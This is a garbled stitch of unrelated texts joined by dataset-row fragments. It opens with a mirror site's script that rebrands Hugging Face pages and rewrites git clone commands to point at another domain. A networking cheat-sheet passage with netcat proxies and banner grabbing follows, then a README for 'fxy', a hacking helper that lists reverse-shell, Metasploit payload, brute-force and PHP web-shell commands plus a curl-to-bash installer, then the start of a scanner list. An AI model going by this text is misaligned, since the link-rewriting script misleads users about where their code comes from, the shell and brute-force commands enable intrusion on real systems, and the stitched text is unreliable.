{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \n\n__EOF__\n```\n\n```bash\nserver> while : ; do \\\n(echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: $(wc -c /\" <\"$_sent\" &\nsed \"s/^/<= /\" <\"$_recv\" &\n\nnc -l -p \"$_listen_port\" <\"$_back\" | \\\ntee \"$_sent\" | \\\nnc \"$_bk_host\" \"$_bk_port\" | \\\ntee \"$_recv\" >\"$_back\"\n```\n\n```bash\nserver> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000\n lport: 8080\nbk_host: 192.168.252.10\nbk_port: 8000\n\nclient> http -p h 10.240.30.3:8080\nHTTP/1.1 200 OK\nAccept-Ranges: bytes\nCache-Control: max-age=31536000\nContent-Length: 2748\nContent-Type: text/html; charset=utf-8\nDate: Sun, 01 Jul 2018 20:12:08 GMT\nLast-Modified: Sun, 01 Apr 2018 21:53:37 GMT\n```\n\n###### Create a single-use TCP or UDP proxy\n\n```bash\n### TCP -> TCP\nnc -l -p 2000 -c \"nc [ip|hostname] 3000\"\n\n### TCP -> UDP\nnc -l -p 2000 -c \"nc -u [ip|hostname] 3000\"\n\n### UDP -> UDP\nnc -l -u -p 2000 -c \"nc -u [ip|hostname] 3000\"\n\n### UDP -> TCP\nnc -l -u -p 2000 -c \"nc [ip|hostname] 3000\"\n```\n\n---\n\n##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html)\n\n###### Testing connection to remote host (with SNI support)\n\n```bash\ngnutls-cli -p 443 google.com\n```\n\n###### Testing connection to remote host (without SNI support)\n\n```bash\ngnutls-cli --disable-sni -p 443 google.com\n```\n\n---\n\n##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html)\n\n###### Testing remote connection to port\n\n```bash\nsocat - TCP4:10.240.30.3:22\n```\n\n- `-` - standard input (STDIO)\n- `TCP4:` - set tcp4 connection with specific params\n - `[hostname|ip]` - set hostname/ip\n - `[1-65535]` - set port number\n\n###### Redirecting TCP-traffic to a UNIX domain socket under Linux\n\n```bash\nsocat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo\n```\n\n- `TCP-LISTEN:` - set tcp listen with specific params\n - `[1-65535]` - set port number\n - `bind=[hostname|ip]` - set bind hostname/ip\n - `reuseaddr` - allows other sockets to bind to an address\n - `fork` - keeps the parent process attempting to produce more connections\n - `su=nobody` - set user\n - `range=[ip-range]` - ip range\n- `UNIX-CLIENT:` - communicates with the specified peer socket\n - `filename` - define socket\n\n---\n\n##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/)\n\n###### Set iface in promiscuous mode and dump traffic to the log file\n\n```bash\np0f -i enp0s25 -p -d -o /dump/enp0s25.log\n```\n\n- `-i` - listen on the specified interface\n- `-p` - set interface in promiscuous mode\n- `-d` - fork into background\n- `-o` - output file\n\n---\n\n##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat)\n\n###### Graph # of connections for each hosts\n\n```bash\nnetstat -an | awk '/ESTABLISHED/ { split($5,ip,\":\"); if (ip[1] !~ /^$/) print ip[1] }' | \\\nsort | uniq -c | awk '{ printf(\"%s\\t%s\\t\",$2,$1) ; for (i = 0; i < $1; i++) {printf(\"*\")}; print \"\" }'\n```\n\n###### Monitor open connections for specific port including listen, count and sort it per IP\n\n```bash\nwatch \"netstat -plan | grep :443 | awk {'print \\$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1\"\n```\n\n###### Grab banners from local IPv4 listening ports\n\n```bash\nnetstat -nlt | grep 'tcp ' | grep -Eo \"[1-9][0-9]*\" | xargs -I {} sh -c \"echo \"\" | nc -v -n -w1 127.0.0.1 {}\"\n```\n\n---\n\n##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync)\n\n###### Rsync remote data as root using sudo\n\n```bash\nrsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/\n```\n\n---\n\n##### Tool: [host]()\n\n###### Resolves the domain name (using external dns server)\n\n```bash\nhost google.com 9.9.9.9\n```\n\n###### Checks the domain administrator (SOA record)\n\n```bash\nhost -t soa google.com 9.9.9.9\n```\n\n---\n\n##### Tool: [dig]()\n\n###### Resolves the domain name (short output)\n\n```bash\ndig google.com +short\n```\n\n###### Lookup NS record for specific domain\n\n```bash\ndig @9.9.9.9 google.com NS\n```\n\n###### Query only answer section\n\n```bash\ndig google.com +nocomments +noquestion +noauthority +noadditional +nostats\n```\n\n###### Query ALL DNS Records\n\n```bash\ndig google.com ANY +noall +answer\n```\n\n###### DNS Reverse Look-up\n\n```bash\ndig -x 172.217.16.14 +short\n```\n\n---\n\n##### Tool: [certbot](https://certbot.eff.org/)\n\n###### Generate multidomain certificate\n\n```bash\ncertbot certonly -d example.com -d www.example.com\n```\n\n###### Generate wildcard certificate\n\n```bash\ncertbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com\n```\n\n###### Generate certificate with 4096 bit private key\n\n```bash\ncertbot certonly -d example.com -d www.example.com --rsa-key-size 4096\n```\n\n---\n\n##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other)\n\n###### Get all subnets for specific AS (Autonomous system)\n\n```bash\nAS=\"AS32934\"\nwhois -h whois.radb.net -- \"-i origin ${AS}\" | \\\ngrep \"^route:\" | \\\ncut -d \":\" -f2 | \\\nsed -e 's/^[ \\t]//' | \\\nsort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \\\ncut -d \":\" -f2 | \\\nsed -e 's/^[ \\t]/allow /' | \\\nsed 's/$/;/' | \\\nsed 's/allow */subnet -> /g'\n```\n\n###### Resolves domain name from dns.google.com with curl and jq\n\n```bash\n_dname=\"google.com\" ; curl -s \"https://dns.google.com/resolve?name=${_dname}&type=A\" | jq .\n```\n\n##### Tool: [git](https://git-scm.com/)\n\n###### Log alias for a decent view of your repo\n\n```bash\n# 1)\ngit log --oneline --decorate --graph --all\n\n# 2)\ngit log --graph \\\n--pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \\\n--abbrev-commit\n```\n\n---\n\n##### Tool: [python](https://www.python.org/)\n\n###### Static HTTP web server\n\n```bash\n# Python 3.x\npython3 -m http.server 8000 --bind 127.0.0.1\n\n# Python 2.x\npython -m SimpleHTTPServer 8000\n```\n\n###### Static HTTP web server with SSL support\n\n```bash\n# Python 3.x\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport ssl\n\nhttpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler)\n\nhttpd.socket = ssl.wrap_socket (httpd.socket,\n keyfile=\"path/to/key.pem\",\n certfile='path/to/cert.pem', server_side=True)\n\nhttpd.serve_forever()\n\n# Python 2.x\nimport BaseHTTPServer, SimpleHTTPServer\nimport ssl\n\nhttpd = BaseHTTPServer.HTTPServer(('localhost', 4443),\n SimpleHTTPServer.SimpleHTTPRequestHandler)\n\nhttpd.socket = ssl.wrap_socket (httpd.socket,\n keyfile=\"path/tp/key.pem\",\n certfile='path/to/cert.pem', server_side=True)\n\nhttpd.serve_forever()\n```\n\n###### Encode base64\n\n```bash\npython -m base64 -e <<< \"sample string\"\n```\n\n###### Decode base64\n\n```bash\npython -m base64 -d <<< \"dGhpcyBpcyBlbmNvZGVkCg==\"\n```\n\n##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html)\n\n###### Search for matching lines\n\n```bash\n# egrep foo\nawk '/foo/' filename\n```\n\n###### Search non matching lines\n\n```bash\n# egrep -v foo\nawk '!/foo/' filename\n```\n\n###### Print matching lines with numbers\n\n```bash\n# egrep -n foo\nawk '/foo/{print FNR,$0}' filename\n```\n\n###### Print the last column\n\n```bash\nawk '{print $NF}' filename\n```\n\n###### Find all the lines longer than 80 characters\n\n```bash\nawk 'length($0)>80{print FNR,$0}' filename\n```\n\n###### Print only lines of less than 80 characters\n\n```bash\nawk 'length < 80' filename\n```\n\n###### Print double new lines a file\n\n```bash\nawk '1; { print \"\" }' filename\n```\n\n###### Print line numbers\n\n```bash\nawk '{ print FNR \"\\t\" $0 }' filename\nawk '{ printf(\"%5d : %s\\n\", NR, $0) }' filename # in a fancy manner\n```\n\n###### Print line numbers for only non-blank lines\n\n```bash\nawk 'NF { $0=++a \" :\" $0 }; { print }' filename\n```\n\n###### Print the line and the next two (i=5) lines after the line matching regexp\n\n```bash\nawk '/foo/{i=5+1;}{if(i){i--; print;}}' filename\n```\n\n###### Print the lines starting at the line matching 'server {' until the line matching '}'\n\n```bash\nawk '/server {/,/}/' filename\n```\n\n###### Print multiple columns with separators\n\n```bash\nawk -F' ' '{print \"ip:\\t\" $2 \"\\n port:\\t\" $3' filename\n```\n\n###### Remove empty lines\n\n```bash\nawk 'NF > 0' filename\n\n# alternative:\nawk NF filename\n```\n\n###### Delete trailing white space (spaces, tabs)\n\n```bash\nawk '{sub(/[ \\t]*$/, \"\");print}' filename\n```\n\n###### Delete leading white space\n\n```bash\nawk '{sub(/^[ \\t]+/, \"\"); print}' filename\n```\n\n###### Remove duplicate consecutive lines\n\n```bash\n# uniq\nawk 'a !~ $0{print}; {a=$0}' filename\n```\n\n###### Remove duplicate entries in a file without sorting\n\n```bash\nawk '!x[$0]++' filename\n```\n\n###### Exclude multiple columns\n\n```bash\nawk '{$1=$3=\"\"}1' filename\n```\n\n###### Substitute foo for bar on lines matching regexp\n\n```bash\nawk '/regexp/{gsub(/foo/, \"bar\")};{print}' filename\n```\n\n###### Add some characters at the beginning of matching lines\n\n```bash\nawk '/regexp/{sub(/^/, \"++++\"); print;next;}{print}' filename\n```\n\n###### Get the last hour of Apache logs\n\n```bash\nawk '/'$(date -d \"1 hours ago\" \"+%d\\\\/%b\\\\/%Y:%H:%M\")'/,/'$(date \"+%d\\\\/%b\\\\/%Y:%H:%M\")'/ { print $0 }' \\\n/var/log/httpd/access_log\n```\n\n---\n\n##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html)\n\n###### Print a specific line from a file\n\n```bash\nsed -n 10p /path/to/file\n```\n\n###### Remove a specific line from a file\n\n```bash\nsed -i 10d /path/to/file\n# alternative (BSD): sed -i'' 10d /path/to/file\n```\n\n###### Remove a range of lines from a file\n\n```bash\nsed -i -re ',d'\n```\n\n###### Replace newline(s) with a space\n\n```bash\nsed ':a;N;$!ba;s/\\n/ /g' /path/to/file\n\n# cross-platform compatible syntax:\nsed -e ':a' -e 'N' -e '$!ba' -e 's/\\n/ /g' /path/to/file\n```\n\n- `:a` create a label `a`\n- `N` append the next line to the pattern space\n- `$!` if not the last line, ba branch (go to) label `a`\n- `s` substitute, `/\\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can)\n\nAlternatives:\n\n```bash\n# perl version (sed-like speed):\nperl -p -e 's/\\n/ /' /path/to/file\n\n# bash version (slow):\nwhile read line ; do printf \"%s\" \"$line \" ; done < file\n```\n\n###### Delete string +N next lines\n\n```bash\nsed '/start/,+4d' /path/to/file\n```\n\n---\n\n##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html)\n\n###### Search for a \"pattern\" inside all files in the current directory\n\n```bash\ngrep -rn \"pattern\"\ngrep -RnisI \"pattern\" *\nfgrep \"pattern\" * -R\n```\n\n###### Show only for multiple patterns\n\n```bash\ngrep 'INFO*'\\''WARN' filename\ngrep 'INFO\\|WARN' filename\ngrep -e INFO -e WARN filename\ngrep -E '(INFO|WARN)' filename\negrep \"INFO|WARN\" filename\n```\n\n###### Except multiple patterns\n\n```bash\ngrep -vE '(error|critical|warning)' filename\n```\n\n###### Show data from file without comments\n\n```bash\ngrep -v ^[[:space:]]*# filename\n```\n\n###### Show data from file without comments and new lines\n\n```bash\negrep -v '#|^$' filename\n```\n\n###### Show strings with a dash/hyphen\n\n```bash\ngrep -e -- filename\ngrep -- -- filename\ngrep \"\\-\\-\" filename\n```\n\n###### Remove blank lines from a file and save output to new file\n\n```bash\ngrep . filename > newfilename\n```\n\n##### Tool: [perl](https://www.perl.org/)\n\n###### Search and replace (in place)\n\n```bash\nperl -i -pe's/SEARCH/REPLACE/' filename\n```\n\n###### Edit of `*.conf` files changing all foo to bar (and backup original)\n\n```bash\nperl -p -i.orig -e 's/\\bfoo\\b/bar/g' *.conf\n```\n\n###### Prints the first 20 lines from `*.conf` files\n\n```bash\nperl -pe 'exit if $. > 20' *.conf\n```\n\n###### Search lines 10 to 20\n\n```bash\nperl -ne 'print if 10 .. 20' filename\n```\n\n###### Delete first 10 lines (and backup original)\n\n```bash\nperl -i.orig -ne 'print unless 1 .. 10' filename\n```\n\n###### Delete all but lines between foo and bar (and backup original)\n\n```bash\nperl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename\n```\n\n###### Reduce multiple blank lines to a single line\n\n```bash\nperl -p -i -00pe0 filename\n```\n\n###### Convert tabs to spaces (1t = 2sp)\n\n```bash\nperl -p -i -e 's/\\t/ /g' filename\n```\n\n###### Read input from a file and report number of lines and characters\n\n```bash\nperl -lne '$i++; $in += length($_); END { print \"$i lines, $in characters\"; }' filename\n```\n\n#### Shell functions &nbsp;[[TOC]](#anger-table-of-contents)\n\n##### Table of Contents\n\n- [Domain resolve](#domain-resolve)\n- [Get ASN](#get-asn)\n\n###### Domain resolve\n\n```bash\n# Dependencies:\n# - curl\n# - jq\n\nfunction DomainResolve() {\n\n local _host=\"$1\"\n\n local _curl_base=\"curl --request GET\"\n local _timeout=\"15\"\n\n _host_ip=$($_curl_base -ks -m \"$_timeout\" \"https://dns.google.com/resolve?name=${_host}&type=A\" | \\\n jq '.Answer[0].data' | tr -d \"\\\"\" 2>/dev/null)\n\n if [[ -z \"$_host_ip\" ]] || [[ \"$_host_ip\" == \"null\" ]] ; then\n\n echo -en \"Unsuccessful domain name resolution.\\\\n\"\n\n else\n\n echo -en \"$_host > $_host_ip\\\\n\"\n\n fi\n\n}\n```\n\nExample:\n\n```bash\nshell> DomainResolve nmap.org\nnmap.org > 45.33.49.119\n\nshell> DomainResolve nmap.org\nUnsuccessful domain name resolution.\n```\n\n###### Get ASN\n\n```bash\n# Dependencies:\n# - curl\n\nfunction GetASN() {\n\n local _ip=\"$1\"\n\n local _curl_base=\"curl --request GET\"\n local _timeout=\"15\"\n\n _asn=$($_curl_base -ks -m \"$_timeout\" \"http://ip-api.com/line/${_ip}?fields=as\")\n\n _state=$(echo $?)\n\n if [[ -z \"$_ip\" ]] || [[ \"$_ip\" == \"null\" ]] || [[ \"$_state\" -ne 0 ]]; then\n\n echo -en \"Unsuccessful ASN gathering.\\\\n\"\n\n else\n\n echo -en \"$_ip > $_asn\\\\n\"\n\n fi\n\n}\n```\n\nExample:\n\n```bash\nshell> GetASN 1.1.1.1\n1.1.1.1 > AS13335 Cloudflare, Inc.\n\nshell> GetASN 0.0.0.0\nUnsuccessful ASN gathering.\n```\n"}}},{"rowIdx":304,"cells":{"text":{"kind":"string","value":"\n# fxy - Fox in the $hell\nfxy is a small and smart bash script for fast command generation of common hacking and CTF related tasks. The source is completely modularized and adding new commands is super easy.\n\n```\n . .\n |\\__/|\n / \\ | FXY || Fox in the $hell |\n/_,- -,_\\ | github.com/doomguy/fxy |\n \\@/\n\nAvailable commands:\n fxy b(ase)64(e|d) [input] : Base64 Encode/Decode\n fxy cewl [s(sl)|tls] [subdir] : cewl PROTO://RHOST+SUBDIR -w RHOST_cewl.txt\n fxy ciph(ey) [input] : ciphey -t INPUT\n fxy cme|crackmapexec [smb] : crackmapexec smb RHOST | tee\n fxy c(reds) [a(dd) user:pass]|[d(el) cid]|[e(dit)] : Show/Add/Del/Edit creds\n fxy curl [s(sl)|tls] [subdir] : curl -si PROTO://RHOST+SUBDIR | less\n fxy (cyber)chef [magic] : Open CyberChef in your browser\n fxy dirb [s(sl)|tls] [subdir] : dirb PROTO://RHOST+SUBDIR | tee\n fxy (evil-)winrm [cid] : evil-winrm -i RHOST -u :cid_user -p :cid_pass\n fxy fix [deps|pip(3)|py(thon)(3)|sys(tem)] : Fix stufff\n fxy h(ash)c(rack) [type] [hash|cid] : Crack hash\n fxy h(ash)i(d) [hash|cid] : Identify hash type\n fxy h(ash)s(earch) [help|any|md5|sha1|...] [hash|cid] : Search for hashes\n fxy h(elp) [search keyword] : Show help or search for keyword\n fxy httpd|ws [port] : Spawn python3 http webserver\n fxy httpsd|wss [port] : Spawn openssl https webserver\n fxy hydra|brute [help|service] [port] [username] : hydra brute force (ssh, ftp, smb, http)\n fxy (i)conv|convert [file] : iconv -f UTF-16LE -t UTF-8 FILE -o FILE.conv\n fxy ip(s) : Show local and external IP(s)\n fxy ipwsh [port] : Download InsecurePowerShell and serve via davserver\n fxy len(gth) [input] : Show length of input\n fxy l(isten) [port] : ncat -vlkp PORT\n fxy md5|sha(1)|sha2(56)|sha3(84)|sha5(12) [input] : Generate hashes from input\n fxy msf [payload] [port] [gen(erate)] [format] : metasploit setup listener / generate payload\n fxy msf ssh(enum) [port] [wordlist] : metasploit ssh user enumeration\n fxy msf web(del)(ivery) [lport] [py|php|psh] : metasploit web delivery module\n fxy nfs|showmount : showmount -e RHOST\n fxy nikto [s(sl)|tls] [subdir] : nikto -host PROTO://RHOST+SUBDIR | tee\n fxy n(map) [full] : nmap -v -A (-p-) RHOST | tee\n fxy pass(word) : Show default machine password\n fxy peas [version] [port] : Download *peas and serve via http.server\n fxy p(ing) [count] : ping -c COUNT RHOST\n fxy rev(shell) [help|type] [port] : Reverse shell generator (bash, php, python, perl, ...)\n fxy r(host) [target] : Show/Set RHOST\n fxy rpc(client) [cid] [domain] [cmd] : rpcclient\n fxy smbpasswd [cid] : smbpasswd -r RHOST -U :cid_user\n fxy socat [port] : socat based listener\n fxy ssh [cid] [port] : sshpass -e ssh :cid_user@RHOST -p PORT\n fxy up(date) : Update fxy\n fxy u(ser)a(gent) [text] : Show/Set User-Agent\n fxy weevely [help|gen] : weevely php shell\n fxy wfuzz [help|s(sl)|tls] [subdir] [hw] [hc] : wfuzz files/folders\n fxy wfuzz vhost [s(sl)|tls] [domain] [hw] [hc] : wfuzz vhost\n\n```\n\n## Easy to Install\n```\ncurl https://raw.githubusercontent.com/doomguy/fxy/master/install.sh | bash\n```\n\n## fxy is Fun\n```\n$ fxy rhost webscantest.com\n\n$ fxy r\n RHOST: webscantest.com\n\n$ fxy nmap\n> nmap -v -A webscantest.com -oA webscantest.com_nmap_2020-08-20_221653\n[?] Run command? (y/N):\n\n$ fxy nikto\n> nikto -host http://webscantest.com/ | tee webscantest.com_nikto_2020-08-20_221718.log\n[?] Run command? (y/N):\n\n$ fxy md5 pass123\n32250170a0dca92d53ec9624f336ca24\n\n$ fxy b64 fxy.rocks\nZnh5LnJvY2tz\n\n$ fxy ciphey Znh5IHJvY2tz\n> ciphey -t 'Znh5IHJvY2tz'\n[?] Run command? (y/N): y\nFormat used:\n base64\n utf8\nFinal result: \"fxy rocks\"\n\n$ fxy hs sha256 a32b722e08c256c1e701c2fc63f88064e9d76e9b01ade5f87fd2f2a6fe42b1a6\n[*] (hashtoolkit.com) Match found: 's3cure'\n```\n"}}},{"rowIdx":305,"cells":{"text":{"kind":"string","value":"English | [简体中文](./README_CN.md)\n \n

\n\n

\n\n

\n \"202301\"\n \"license\"\n \"number\"\n \"Twitter\n

\n
\n\n## Donate with PayPal\n\n\n\n\n## Sponsors\n
\n\nAlbert\n
\n\n## Introduction\n\n**Scanners Box** also known as **scanbox**, is a powerful **hacker toolkit**, which has collected more than 10 categories of open source scanners from Github, including subdomain, database, middleware and other modular design scanner etc. **But for other Well-known scanning tools, such as nmap, w3af, brakeman, arachni, nikto, metasploit, aircrack-ng will not be included in the scope of collection.**\n\n## Contents\n\n\n\n- [Large Language Model Security](#large-language-model-security)\n- [Smart Contracts Security](#smart-contracts-security)\n- [Red Team vs Blue Team](#red-team-vs-blue-team)\n- [Mobile App Packages Analysis](#mobile-apps-packages-analysis)\n- [Binary Executables Analysis](#binary-executables-analysis)\n- [Privacy Compliance](#privacy-compliance)\n- [Subdomain Enumeration or Takeover](#subdomain-enumeration-or-takeover)\n- [Database SQL Injection Vulnerability or Brute Force](#database-sql-injection-vulnerability-or-brute-force)\n- [Weak Usernames or Passwords Enumeration For Web](#weak-usernames-or-passwords-enumeration-for-web)\n- [Authorization Brute Force or Vulnerability Scan For IoT](#authorization-brute-force-or-vulnerability-scan-for-iot)\n- [Mutiple types of Cross-site scripting Detection](#mutiple-types-of-cross-site-scripting-detection)\n- [Enterprise sensitive information Leak Scan](#enterprise-sensitive-information-leak-scan)\n- [Malicious Scripts Detection](#malicious-scripts-detection)\n- [Vulnerability Assessment for Middleware](#vulnerability-assessment-for-middleware)\n- [Special Targets Scan](#special-targets-scan)\n- [Dynamic or Static Code Analysis](#dynamic-or-static-code-analysis)\n- [Modular Design Scanners or Vulnerability Detecting Framework](#modular-design-scanners-or-vulnerability-detecting-framework)\n- [Advanced Persistent Threat Detect](#advanced-persistent-threat-detect)\n\n\n\n\n***\n\n### Large Language Model Security\n\n- https://github.com/leondz/garak - **LLM vulnerability scanner for hallucination, data leakage, promp injection, misinformation, toxicity generation, jailbreaks, and many other weaknesses**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/leondz/garak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/leondz/garak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/leondz/garak.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/leondz/garak?style=flat-square)\n\n- https://github.com/protectai/rebuff - **Designed to protect AI applications from prompt injection (PI) attacks**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/protectai/rebuff?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/protectai/rebuff?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/protectai/rebuff.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/protectai/rebuff?style=flat-square)\n\n- https://github.com/mnns/LLMFuzzer - **Fuzzing Framework for Large Language Models**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mnns/LLMFuzzer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mnns/LLMFuzzer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mnns/LLMFuzzer.svg?style=flat-square) 